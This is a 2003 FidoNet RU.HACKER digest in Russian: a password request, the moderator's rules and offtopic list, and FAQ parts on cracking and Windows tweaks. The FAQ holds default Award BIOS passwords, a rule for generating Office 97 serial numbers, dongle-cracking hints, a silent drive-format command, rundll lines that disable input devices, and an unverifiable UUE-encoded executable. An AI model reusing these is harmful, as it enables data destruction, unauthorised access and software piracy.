быть доступен связь не AK> обрывается). А что пишется в логах? Что пытается послать винда, и что отвечает (или не отвечает) модем? Что происходит через эти пол минуты? А то так даже и не понятно совсем... --- * Origin: NeOS Technologies, Inc. (2:5030/595.6) = Здесь обитают хакеры ====================================================New= Msg : 5628 [1-10330] From : Pavel M. Kidyarov 03-Jun-03 09:07:48 2:5006/1 To : All Subj : QuickReport v3.62 для Delphi6 и TeeChart6 для Delphi6 =====================================================================RU.HACKER= Hужен пароль для скачивания для QuickReport v3.62 для Delphi6 и Лицензия с паролем для TeeChart6 для Delphi6 Жду ответов :) --- Microsoft Outlook Express 5.50.4807.1700 * Origin: SVZ-Service (2:5006/1@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 5629 [1-10330] K/s From : Moderator's Post 03-Jun-03 00:07:19 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постяться в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5630 [1-10330] K/s From : Moderator's Post 03-Jun-03 00:07:20 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5631 [1-10330] K/s From : Moderator's Post 03-Jun-03 00:07:22 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5632 [1-10330] K/s From : Moderator's Post 03-Jun-03 00:07:22 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново 